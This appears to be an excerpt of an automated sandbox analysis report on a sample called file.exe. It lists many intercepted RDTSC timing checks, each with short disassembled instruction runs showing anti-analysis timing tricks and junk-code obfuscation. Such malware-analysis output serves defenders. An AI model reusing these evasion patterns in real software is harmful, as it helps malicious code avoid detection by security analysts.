                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9D866 second address: B9D884 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C3A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F6B30D7C39Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9D884 second address: B9D88E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0026 second address: 4EA003E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B30D7C3A4h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA003E second address: 4EA0042 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0042 second address: 4EA0094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F6B30D7C3A3h 0x00000011 pop esi 0x00000012 pushfd 0x00000013 jmp 00007F6B30D7C3A9h 0x00000018 adc cx, 8306h 0x0000001d jmp 00007F6B30D7C3A1h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0094 second address: 4EA009A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA009A second address: 4EA009E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA009E second address: 4EA00DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F6B312295EFh 0x0000000e mov ebp, esp 0x00000010 jmp 00007F6B312295F6h 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F6B312295EAh 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA00DD second address: 4EA00E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80DA2 second address: 4E80DBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80DBF second address: 4E80DC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80DC5 second address: 4E80DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80DC9 second address: 4E80DFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C3A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F6B30D7C3A2h 0x00000014 mov si, 9591h 0x00000018 popad 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80DFD second address: 4E80E47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov ax, 9585h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F6B312295F0h 0x00000013 mov ebp, esp 0x00000015 jmp 00007F6B312295F0h 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F6B312295F7h 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80E47 second address: 4E80E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80E4D second address: 4E80E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80E51 second address: 4E80E55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED059C second address: 4ED05CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, cx 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F6B312295F8h 0x0000000e push eax 0x0000000f jmp 00007F6B312295EBh 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 mov ebx, ecx 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60116 second address: 4E60152 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C3A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F6B30D7C3A0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6B30D7C39Eh 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60152 second address: 4E601A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6B312295F1h 0x00000009 adc esi, 439716F6h 0x0000000f jmp 00007F6B312295F1h 0x00000014 popfd 0x00000015 jmp 00007F6B312295F0h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F6B312295EAh 0x00000027 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E601A1 second address: 4E601B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C39Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E601B0 second address: 4E601C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B312295F4h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E601C8 second address: 4E6027D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b movsx edi, ax 0x0000000e movzx ecx, di 0x00000011 popad 0x00000012 push dword ptr [ebp+04h] 0x00000015 pushad 0x00000016 push ebx 0x00000017 jmp 00007F6B30D7C39Ah 0x0000001c pop eax 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F6B30D7C3A1h 0x00000024 and si, FC76h 0x00000029 jmp 00007F6B30D7C3A1h 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007F6B30D7C3A0h 0x00000035 jmp 00007F6B30D7C3A5h 0x0000003a popfd 0x0000003b popad 0x0000003c popad 0x0000003d push dword ptr [ebp+0Ch] 0x00000040 jmp 00007F6B30D7C39Eh 0x00000045 push dword ptr [ebp+08h] 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b pushfd 0x0000004c jmp 00007F6B30D7C39Dh 0x00000051 add si, B1E6h 0x00000056 jmp 00007F6B30D7C3A1h 0x0000005b popfd 0x0000005c mov bx, cx 0x0000005f popad 0x00000060 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E602A3 second address: 4E602A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E602A7 second address: 4E602C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C3A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80B81 second address: 4E80B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B312295EAh 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80645 second address: 4E80665 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C3A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80665 second address: 4E80678 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80512 second address: 4E8055B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C3A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, edx 0x0000000f pushfd 0x00000010 jmp 00007F6B30D7C39Fh 0x00000015 sub ch, FFFFFFBEh 0x00000018 jmp 00007F6B30D7C3A9h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8055B second address: 4E80597 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6B312295F7h 0x00000009 sub si, 97CEh 0x0000000e jmp 00007F6B312295F9h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80597 second address: 4E805FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F6B30D7C3A7h 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov ebx, esi 0x00000011 push ecx 0x00000012 jmp 00007F6B30D7C3A7h 0x00000017 pop esi 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov eax, 06494197h 0x00000023 pushfd 0x00000024 jmp 00007F6B30D7C39Ch 0x00000029 and cx, 8D08h 0x0000002e jmp 00007F6B30D7C39Bh 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E805FD second address: 4E80615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B312295F4h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80615 second address: 4E80619 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8031A second address: 4E8031E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8031E second address: 4E80324 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80324 second address: 4E80374 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F6B312295EEh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F6B312295F0h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6B312295F7h 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9028F second address: 4E902A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B30D7C3A6h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E902A9 second address: 4E902AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E902AD second address: 4E902C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6B30D7C39Ah 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED050F second address: 4ED055D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop ecx 0x0000000e push edx 0x0000000f pop ecx 0x00000010 popad 0x00000011 mov cl, bl 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F6B312295EAh 0x0000001c add ah, FFFFFFC8h 0x0000001f jmp 00007F6B312295EBh 0x00000024 popfd 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov di, ax 0x0000002e popad 0x0000002f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA03E5 second address: 4EA0418 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C3A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F6B30D7C39Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0418 second address: 4EA0434 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0434 second address: 4EA04B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C39Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ecx, 46CACACBh 0x00000010 jmp 00007F6B30D7C3A0h 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007F6B30D7C3A0h 0x0000001d mov eax, dword ptr [ebp+08h] 0x00000020 pushad 0x00000021 mov edx, eax 0x00000023 mov bx, cx 0x00000026 popad 0x00000027 and dword ptr [eax], 00000000h 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F6B30D7C3A2h 0x00000031 or ax, F768h 0x00000036 jmp 00007F6B30D7C39Bh 0x0000003b popfd 0x0000003c push eax 0x0000003d push edx 0x0000003e call 00007F6B30D7C3A6h 0x00000043 pop eax 0x00000044 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E804C7 second address: 4E804DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov bx, ax 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90EA8 second address: 4E90ED8 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 304D0016h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push esi 0x0000000b jmp 00007F6B30D7C39Ah 0x00000010 mov dword ptr [esp], ebp 0x00000013 jmp 00007F6B30D7C3A0h 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90ED8 second address: 4E90EF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90EF5 second address: 4E90EFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC07C5 second address: 4EC07DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B312295F4h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC07DD second address: 4EC081C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C39Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d jmp 00007F6B30D7C39Bh 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 call 00007F6B30D7C39Fh 0x0000001a mov bx, ax 0x0000001d pop esi 0x0000001e popad 0x0000001f xchg eax, ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov ecx, 650FF04Fh 0x00000028 popad 0x00000029 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC081C second address: 4EC0899 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B312295F7h 0x00000008 movzx esi, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [775165FCh] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F6B312295F1h 0x0000001a and cx, 5996h 0x0000001f jmp 00007F6B312295F1h 0x00000024 popfd 0x00000025 mov ebx, ecx 0x00000027 popad 0x00000028 test eax, eax 0x0000002a jmp 00007F6B312295EAh 0x0000002f je 00007F6BA37FC6D2h 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F6B312295F7h 0x0000003c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0899 second address: 4EC08CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C3A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b pushad 0x0000000c mov edx, eax 0x0000000e push eax 0x0000000f mov cx, bx 0x00000012 pop edi 0x00000013 popad 0x00000014 xor eax, dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c mov edi, ecx 0x0000001e popad 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC08CC second address: 4EC08DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B312295EEh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC08DE second address: 4EC08E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC08E2 second address: 4EC08F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and ecx, 1Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6B312295EAh 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC08F9 second address: 4EC08FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC09C9 second address: 4EC09CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC09CD second address: 4EC09D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC09D3 second address: 4EC09D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC09D8 second address: 4EC0A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F6B30D7C39Dh 0x0000000a or cl, FFFFFFB6h 0x0000000d jmp 00007F6B30D7C3A1h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movsx edi, si 0x0000001e mov cl, E2h 0x00000020 popad 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0A0D second address: 4EC0A4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov di, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F6B312295F1h 0x00000015 sbb ax, 0B76h 0x0000001a jmp 00007F6B312295F1h 0x0000001f popfd 0x00000020 mov ax, 3A67h 0x00000024 popad 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70073 second address: 4E70079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70079 second address: 4E700AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6B312295F5h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E700AA second address: 4E70114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C3A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d movzx ecx, bx 0x00000010 pushfd 0x00000011 jmp 00007F6B30D7C39Fh 0x00000016 xor al, 0000001Eh 0x00000019 jmp 00007F6B30D7C3A9h 0x0000001e popfd 0x0000001f popad 0x00000020 movzx esi, dx 0x00000023 popad 0x00000024 and esp, FFFFFFF8h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F6B30D7C3A5h 0x00000030 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70114 second address: 4E7011A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7011A second address: 4E70147 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 mov di, F6EAh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e jmp 00007F6B30D7C39Eh 0x00000013 mov dword ptr [esp], ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F6B30D7C39Ah 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70147 second address: 4E7014D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7014D second address: 4E70170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6B30D7C3A7h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70170 second address: 4E701C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B312295EFh 0x00000008 mov esi, 1AE9225Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], ebx 0x00000013 jmp 00007F6B312295F2h 0x00000018 mov ebx, dword ptr [ebp+10h] 0x0000001b pushad 0x0000001c mov ebx, ecx 0x0000001e mov ecx, 14585599h 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 jmp 00007F6B312295F4h 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E701C6 second address: 4E701CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E701CD second address: 4E70222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F6B312295F3h 0x00000013 sub ch, FFFFFFCEh 0x00000016 jmp 00007F6B312295F9h 0x0000001b popfd 0x0000001c push eax 0x0000001d pop edx 0x0000001e popad 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70222 second address: 4E702B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6B30D7C3A3h 0x00000009 or ecx, 025875DEh 0x0000000f jmp 00007F6B30D7C3A9h 0x00000014 popfd 0x00000015 call 00007F6B30D7C3A0h 0x0000001a pop esi 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov esi, dword ptr [ebp+08h] 0x00000021 jmp 00007F6B30D7C3A1h 0x00000026 xchg eax, edi 0x00000027 pushad 0x00000028 mov dl, ah 0x0000002a movsx edx, ax 0x0000002d popad 0x0000002e push eax 0x0000002f jmp 00007F6B30D7C39Bh 0x00000034 xchg eax, edi 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 call 00007F6B30D7C3A7h 0x0000003d pop eax 0x0000003e popad 0x0000003f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E702B2 second address: 4E702B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E702B8 second address: 4E702BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E702BC second address: 4E702C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
